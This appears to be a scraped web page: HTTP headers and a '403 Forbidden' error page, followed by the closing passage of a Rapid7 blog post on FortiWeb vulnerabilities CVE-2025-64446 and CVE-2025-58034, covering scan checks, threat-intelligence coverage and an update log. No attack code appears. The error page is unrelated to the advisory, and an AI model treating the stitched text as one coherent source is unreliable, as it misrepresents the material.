X-XSS-Protection: 1; mode=block
Content-Security-Policy: script-src 'self'; default-src 'self'; style-src 'self' 'unsafe-inline'; font-src 'self'; img-src 'self' data:; connect-src 'self'; frame-ancestors 'self'; object-src 'none'; base-uri 'self'; upgrade-insecure-requests; block-all-mixed-content;
X-Content-Type-Options: nosniff
Content-Length: 199
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
</body></html>

Rapid7 customers

Exposure Command, InsightVM and Nexpose

Exposure Command, InsightVM and Nexpose customers can assess their exposure to both vulnerabilities described in this blog post as follows:

• CVE-2025-64446: an unauthenticated vulnerability check is available in the November 14 content release. Please note that the “SAFE” check mode needs to be disabled while running scans to ensure the check for CVE-2025-64446 runs successfully.
• CVE-2025-58034: an authenticated vulnerability check is available in the November 26 content release. There is no need to disable the “SAFE” check mode, since the CVE-2025-58034 check will run by default.

Intelligence Hub

Customers leveraging Rapid7’s Intelligence Hub can track the latest developments surrounding CVE-2025-64446, including a Sigma rule and IOCs of IP addresses attempting to exploit this vulnerability.

Updates

• November 14, 2025: The blog post has been updated to reflect the newly-published official advisory and CVE identifier, the availability of vulnerability checks and a Metasploit module for customer testing, the CISA KEV addition, and a published technical analysis.

• November 17, 2025: The Rapid7 customers section has been updated to add Intelligence Hub coverage, and clarify that vulnerability checks were shipped on Nov 14, 2025.

• November 19, 2025: The Overview section has been updated to reference the newly published vulnerability, CVE-2025-58034. The Rapid7 customers section has been updated to add expected coverage availability for CVE-2025-58034.

• November 19, 2025: The Rapid7 customers section has been updated with CVE-2025-58034 coverage information for supported FortiWeb release branches.

• December 1, 2025: The Mitigation guidance section has been updated with confirmation that older unsupported versions of FortiWeb 6.x are also vulnerable to both CVE-2025-64446 and CVE-2025-58034.